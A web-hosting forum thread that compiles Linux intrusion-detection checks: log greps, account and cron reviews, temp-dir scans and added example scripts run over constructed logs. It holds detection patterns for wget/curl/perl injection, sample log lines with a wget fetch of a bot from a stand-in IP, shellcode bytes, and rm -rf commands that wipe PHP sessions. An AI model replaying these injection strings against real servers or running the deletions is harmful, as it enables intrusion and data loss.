-
05-22-2007, 01:42 AM #1 | Web Hosting Evangelist | Joined Apr 2006 | 520 posts
How to detect a possible intruder?
Advice: these are steps compiled from the net and from some books; they were not written by me.
Hello.
I have a few incomplete steps to check whether I have an intruder in my Linux system, but I would really like to have all your suggestions to make a good doc about this matter, so please post your tips and tricks on this subject.
1.- Download and run Rkhunter & Chkrootkit
2.- Run "w" and "netstat -nalp | grep SSHPORTHERE" to see who is connected using SSH
3.- Search for accepted ssh and ftp logins.
Code:
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* | grep ftp | grep Accept
grep ftp /var/log/messages
Code:
# every socket with its owning process, then a full port scan of the box itself
netstat -nalp
nmap -p 1-65535 localhost
Code:
# clear the usual drop zones, then list what is left (-b makes names with spaces visible)
# (see post #6: /tmp/sess* is also where PHP keeps its session files)
rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls -lab /tmp
ls -labR /var/tmp
ls -labR /dev/shm
ls -labR /usr/local/apache/proxy
ls -labR /usr/local/samba
Code:
# look for added accounts, empty password fields, extra uid 0 users and new groups
less /etc/passwd
less /etc/shadow
less /etc/group
Code:
# who may sudo, the full login history, and whether telnet was (re)enabled
cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
Code:
# every shell history on the box, including those under unexpected home dirs
find / -iname .bash_history
Code:
# cron jobs of the current user (other users' crontabs live under /var/spool/cron)
crontab -l
Code:
# refresh the locate database for the searches below
updatedb &
Code:
# web logs: PHP/shell function calls and URL-encoded download/compile commands in requests
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
Code:
# shellcode in requests: the 0x90 NOP byte as apache writes it into the log
grep -F '\x90' /path/of/your/web/logs/*
Code:
# hidden directories whose names are only dots and spaces
locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."
Code:
# perl processes (IRC bots and backdoors are often perl scripts)
ps aux | grep perl
Code:
# stop apache; anything still running as the web user afterwards is not apache
service httpd stop
lsof -u nobody
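The following is an added example and not code from the original post. It turns two of the checklist items above (step 3, the accepted SSH logins, and the injection grep over the web logs) into shell functions and runs them over constructed sample log lines, so it works offline. The log paths, host name, user names and IP addresses in it are assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post: two of the checklist's log
# checks (accepted ssh logins; the injection grep over web logs) as shell
# functions, run over constructed sample log lines so it works offline. The
# paths, host name, user names and IP addresses below are assumptions.

# Step 3: accepted SSH logins from a /var/log/secure-style file, summarised as
# "COUNT user from ip", most frequent first.
ssh_accepted_summary() {                              # $1 = secure log
    grep -- 'sshd.*Accepted' "$1" \
      | awk '{ for (i = 1; i <= NF; i++) { if ($i == "for") u = $(i+1); if ($i == "from") h = $(i+1) }
               print u " from " h }' \
      | sort | uniq -c | sort -rn
}

# Number of accepted SSH logins (prints 0 when there are none; exit status is
# always 0 so the function is safe under "set -e").
ssh_accepted_count() {                                # $1 = secure log
    grep -c -- 'sshd.*Accepted' "$1" || true
}

# The checklist's injection pattern: PHP/shell function calls and URL-encoded
# download/compile commands ("wget%20", "perl%20", ...) in request lines.
INJECT_RE='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'

weblog_injection_lines() {                            # $1 = access log
    grep -Ei -- "$INJECT_RE" "$1" || true
}

weblog_injection_count() {                            # $1 = access log
    grep -Eic -- "$INJECT_RE" "$1" || true
}

# Everything a nightly cron job could pipe into "mail -s" to get it off the box.
intruder_report() {                                   # $1 = secure log, $2 = access log
    printf '== accepted ssh logins: %s\n' "$(ssh_accepted_count "$1")"
    ssh_accepted_summary "$1"
    printf '== web requests matching the injection pattern: %s\n' "$(weblog_injection_count "$2")"
    weblog_injection_lines "$2"
}

# Constructed sample logs (not real data); prints the directory holding them.
make_sample_logs() {
    d=$(mktemp -d)
    cat > "$d/secure" <<'EOF'
May 22 01:10:02 host sshd[2231]: Accepted password for root from 203.0.113.7 port 4412 ssh2
May 22 01:12:45 host sshd[2290]: Failed password for root from 198.51.100.9 port 5001 ssh2
May 22 02:03:11 host sshd[2410]: Accepted publickey for admin from 192.0.2.15 port 51022 ssh2
May 22 03:40:00 host sshd[2602]: Accepted password for root from 203.0.113.7 port 4501 ssh2
May 22 04:01:13 host vsftpd[2700]: CONNECT: Client "203.0.113.7"
EOF
    cat > "$d/access_log" <<'EOF'
203.0.113.7 - - [22/May/2007:01:42:10 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512
203.0.113.7 - - [22/May/2007:01:43:01 +0000] "GET /index.php?page=http://198.51.100.9/x.txt?cmd=wget%20http://198.51.100.9/bot.pl HTTP/1.1" 200 88
198.51.100.9 - - [22/May/2007:01:44:12 +0000] "GET /forum/?q=system(%22id%22) HTTP/1.1" 500 0
192.0.2.15 - - [22/May/2007:01:45:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4312
EOF
    printf '%s\n' "$d"
}

SAMPLES=$(make_sample_logs)
intruder_report "$SAMPLES/secure" "$SAMPLES/access_log"
rm -rf -- "$SAMPLES"
```

On the sample data the report shows three accepted logins (root twice from the same address) and two flagged requests; note that the first sample request, a plain directory traversal, is not caught, because the checklist's pattern only keys on function names and URL-encoded commands. Pointing intruder_report at the real /var/log/secure and apache log from cron and piping it into mail gives the off-box copy that post #18 suggests.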
-
05-22-2007, 05:53 AM #2 | Junior Guru Wannabe | Joined Oct 2003 | 51 posts
Dude, rockin' thread. That was the single most useful thing I've read, and as a relative Linux noob with security issues I have had to do a lot of Googling.
Beauty work. Really. Pretty much what every noob to Linux security and bash needs to know to have any sort of "ability" to counter hackers. The bash_history bit was the best. So damn useful.
-
05-22-2007, 06:00 AM #3 | Web Hosting Evangelist | Joined Apr 2006 | 520 posts
Glad to hear that.
Here is another tip to track exploits in temp dirs; it's a bash script:
Code:
#!/bin/bash
# list files and directories in the usual drop zones that are owned by the web-server
# user, keeping directory headers, directories, executables and .pl scripts
: > exploits.txt
for x in /dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp; do
    ls -loAFR "$x" 2>/dev/null \
      | grep -E "^$|^/| apache | nobody | unknown | www | web " \
      | grep -E "^$|^/|/$|\*$|\.pl$" \
      | tee -a exploits.txt
done
echo -e "\n\nPossible Exploit Files and Directories: $(grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' ')" | tee -a exploits.txt
-
05-25-2007, 04:59 AM #4 | Temporarily Suspended | Joined Jan 2006 | 3 posts
Also try this - ossec.net
-
05-25-2007, 04:37 PM #5 | Web Hosting Evangelist | Joined Apr 2006 | 520 posts
Cool, I will test this.
Any other suggestions?
Thanks
-
05-25-2007, 04:39 PM #6 | Problem Solver | Joined Mar 2003 | California USA | 13,681 posts
rm -rf /tmp/sess*

Steven Ciaburri | Rack911.com
-
05-25-2007, 11:35 PM #7 | Web Hosting Evangelist | Joined Apr 2006 | 520 posts
Oh, thanks, I will correct that.
-
06-11-2007, 03:37 PM #8 | New Member | Joined Jun 2007 | 4 posts
Nice, I will put this to use, lol. You did a good job at explaining this.
-
06-13-2007, 11:36 PM #9 | Junior Guru Wannabe | Joined May 2004 | 98 posts
This is an excellent thread. Bookmarked this one.
-
07-21-2007, 11:13 PM #10 | Junior Guru Wannabe | Joined Jun 2006 | 67 posts
Thanks, this is very useful
-
07-30-2007, 09:10 PM #11 | New Member | Joined Jul 2007 | 1 post
great info! thanks
-
09-16-2007, 12:56 AM #12 | Junior Guru Wannabe | Joined Sep 2007 | 48 posts
How would you compare OSSEC to Osiris?
-
10-19-2007, 12:28 PM #13 | WHT Addict | Joined Dec 2004 | 104 posts
Thanks, man.
cat /path/of/your/web/logs/* |grep "/x90/"
What does this thing do?
Is there a script to search my whole server to see if there is a shell file?
-
01-02-2008, 09:32 PM #14 | Newbie | Joined Jan 2008 | 6 posts
This is outdated...
This can be easily bypassed using asm or binary lol.....
-
01-13-2008, 10:54 AM #15 | Newbie | Joined Dec 2007 | 7 posts
thanks! good info!
-
02-10-2008, 03:41 AM #16 | Newbie | Joined Jan 2008 | India | 11 posts
Thanks for such an informative thread. It will help many of us.
Good job.
-
02-23-2008, 05:09 PM #17 | Newbie | Joined Jan 2004 | 11 posts
Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.
-
02-23-2008, 06:20 PM #18 | Web Hosting Evangelist | Joined Apr 2006 | 520 posts
You can always write a shell script and send the results by mail, and believe me, a good cracker already knows about all this stuff.
-
07-24-2008, 02:22 PM #19 | WHT Addict | Joined Aug 2004 | 142 posts
This is kind of old.
-
07-24-2008, 05:15 PM #20 | ******* Unleaded | Joined Feb 2004 | 3,849 posts
This is kind of old.
-
07-25-2008, 06:28 AM #21 | Aspiring Evangelist | Joined Aug 2004 | 417 posts
This might be an old post, but... That line searches files for shellcode. Shellcode doesn't have anything to do with the Linux shell. It's machine code that an attacker attempts to execute on your server by using scripts or applications called "exploits". Basically, an exploit will attempt to (ab)use a vulnerability in an application (e.g. a buffer overflow vulnerability) to inject shellcode (e.g. code that listens on a port and binds a Linux command line to it), which is then executed by the CPU. For more information I recommend searching Google for the article "Smashing the Stack for Fun and Profit". It's heavy literature for newbies, but it's worth reading.
About the OP: most of the techniques explained above are really basic and will only detect possible attacks by 'newbie script kiddies'. I recommend installing an advanced IDS such as Snort or Tripwire. If you're running cPanel, install ConfigServer Firewall, since its LFD tool will monitor a lot of things on your server and send you notifications via email if it detects something that you might want to look into. For those who do not use cPanel: use LSM and BFD from R-fx Networks.
Of course, the best way is to focus on intrusion prevention/avoidance and not only intrusion detection.
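The following is an added example and not code from this post or anyone else in the thread. It implements the check the post above describes, looking for NOP sleds (runs of the 0x90 byte) in web logs. In a text log the byte appears in one of two spellings, the "\x90" escape apache writes for non-printable request bytes, or the URL-encoded "%90", so both are matched. The minimum run length is a parameter because a lone %90 is legitimate (it is, for instance, the last byte of the UTF-8 hyphen %E2%80%90), which is why the OP's one-byte grep needs some care. The sample log lines and addresses are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread. It implements the check the post above
# describes: looking for NOP sleds, runs of the 0x90 byte, in web logs. In a text
# log the byte shows up in one of two spellings, the literal escape "\x90" or the
# URL-encoding "%90", so both are matched. The minimum run length is a parameter
# because a single %90 is legitimate on its own (it is the last byte of, for
# example, the UTF-8 hyphen %E2%80%90). The sample log lines are constructed.

# Lines of $2 containing at least $1 consecutive \x90 or %90 tokens.
nop_sled_lines() {                          # $1 = minimum run length, $2 = log file
    grep -E -- '(\\x90|%90){'"$1"',}' "$2" || true
}

# Count of such lines; prints 0 and exits 0 when nothing matches.
nop_sled_count() {                          # $1 = minimum run length, $2 = log file
    grep -Ec -- '(\\x90|%90){'"$1"',}' "$2" || true
}

# Client addresses (first field of a combined-format line) behind the hits.
nop_sled_sources() {                        # $1 = minimum run length, $2 = log file
    nop_sled_lines "$1" "$2" | awk '{ print $1 }' | sort -u
}

# Constructed sample access log: two real sleds, one UTF-8 hyphen, one short run.
make_sample_access_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.7 - - [25/Jul/2008:06:28:01 +0000] "GET /cgi-bin/search?q=%90%90%90%90%90%90%90%90%90%90%90%90%31%c0%50%68 HTTP/1.0" 400 226
198.51.100.9 - - [25/Jul/2008:06:29:14 +0000] "POST /upload.php HTTP/1.1" 200 12 "-" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e"
192.0.2.15 - - [25/Jul/2008:06:30:00 +0000] "GET /wiki/Foo%E2%80%90Bar HTTP/1.1" 200 3100
192.0.2.15 - - [25/Jul/2008:06:31:42 +0000] "GET /?id=%90%90 HTTP/1.1" 200 120
EOF
    printf '%s\n' "$f"
}

LOG=$(make_sample_access_log)
printf 'requests carrying a sled of 8 or more NOPs: %s\n' "$(nop_sled_count 8 "$LOG")"
nop_sled_lines 8 "$LOG"
printf 'sources: %s\n' "$(nop_sled_sources 8 "$LOG" | tr '\n' ' ')"
printf 'lines flagged if every lone %%90 counted: %s\n' "$(nop_sled_count 1 "$LOG")"
rm -f -- "$LOG"
```

With a threshold of 8 only the two sled-carrying requests are reported; dropping the threshold to 1 also flags the wiki page with the encoded hyphen and the two-byte query string, which is the false-positive rate a bare grep for "\x90" or "%90" would give you. Eight is an assumption; pick whatever is comfortably longer than any legitimate encoded sequence on your site.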
-
07-25-2008, 06:33 AM #22 | Aspiring Evangelist | Joined May 2007 | 442 posts
What is LSM?
BFD = Brute force detection on APF firewall, correct?
-
07-25-2008, 07:28 PM #23 | WHT Addict | Joined Dec 2006 | 131 posts
Thank you for posting this, guys!
I found a slew of files in a ". " directory. I was able to delete the files, but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotation marks, but it still shows up and won't go away.
I also found an IRC perl connection open on my server, which goes along with the ". " directory contents I found. Man, what a headache!!!
-
07-26-2008, 07:28 AM #24 | Aspiring Evangelist | Joined Aug 2004 | 417 posts
-
08-17-2008, 03:18 AM #25 | Aspiring Evangelist | Joined Jun 2003 | 367 posts